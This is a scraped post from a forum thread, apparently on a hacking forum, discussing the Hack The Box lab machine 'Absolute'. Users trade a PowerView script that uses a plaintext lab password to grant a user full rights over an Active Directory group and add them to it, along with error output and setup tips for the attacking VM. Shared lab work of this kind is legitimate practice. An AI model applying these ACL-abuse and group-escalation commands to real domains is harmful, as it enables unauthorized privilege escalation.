<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=543008#pid543008" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=543008#pid543008" title="RE: Absolute - HTB [Discussion]">#109</a></strong>
</div>
</div>
<span class="post_date"><span title="September 28, 2022">Yesterday</span>, 07:57 AM <span class="post_edit" id="edited_by_543008"></span></span>
</div>
<div class="post_body scaleimages" id="pid_543008">
<blockquote class="mycode_quote"><cite><span> (<span title="September 28, 2022">Yesterday</span>, 07:56 AM)</span>samhub123 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=543002#pid543002" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 28, 2022">Yesterday</span>, 07:51 AM)</span>meowmeowattack Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=542979#pid542979" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 28, 2022">Yesterday</span>, 03:14 AM)</span>Hacker2222 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=541523#pid541523" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 28, 2022">Yesterday</span>, 02:49 AM)</span>samhub123 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=541427#pid541427" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 28, 2022">Yesterday</span>, 02:38 AM)</span>Hacker2222 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=541370#pid541370" rel="nofollow"></a></cite>if u have ccache file then just use evilwinrm?? how ddid u add lovegod to the group tho?</blockquote><br>
<blockquote class="mycode_quote"><cite>Quote:</cite>$dc_domain="absolute.htb"<br>
<br>
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force<br/>
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)<br/>
<br/>
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"<br/>
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb<br/>
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred</br></br></blockquote>
<br/>
Let me know if you get winrm working.</br></blockquote>thanks ................... need to make windows server vm i think ........ commando vm cant run DomainObjectAcl  i guess ..... will catch up  <img alt="Tongue" class="smilie smilie_5" src="https://breached.to/images/smilies/tongue.png" title="Tongue"/></blockquote><br/>
i re-installed a windows server 2019 from scratch and installed the activedirectory module, still getting password incorrect error with the powershell script above, so shouldn't be anything to do with the distribution. there might still be a setup issue.<br/>
<br/>
FYI, i did the following to setup the windows server:<br/>
* Install ActiveDirectory module<br/>
* Add hosts file entry for absolute.htb<br/>
* Change internet time server to absolute.htb<br/>
* Chagen network adatpr DNS server to the target DC IP<br/>
<br/>
<div class="codeblock"><div class="body" dir="ltr"><code>Exception calling "FindAll" with "0" argument(s): "The user name or password is incorrect.<br/>
"<br/>
At C:\tev\PowerView.ps1:6663 char:20<br/>
+             else { $Results = $ObjectSearcher.FindAll() }<br/>
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br/>
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException<br/>
    + FullyQualifiedErrorId : DirectoryServicesCOMException<br/>
<br/>
Unable to resolve principal: m.lovegod<br/>
At C:\tev\PowerView.ps1:8529 char:13<br/>
+             throw "Unable to resolve principal: $PrincipalIdentity"<br/>
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br/>
    + CategoryInfo          : OperationStopped: (Unable to resolve principal: m.lovegod:String) [], RuntimeException<br/>
    + FullyQualifiedErrorId : Unable to resolve principal: m.lovegod</code></div></div></blockquote><br/>
what command you got that error on?</blockquote><br/>
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"
				</div>
<div class="post_meta" id="post_meta_543008">
<div class="float_right">
</div>
</div>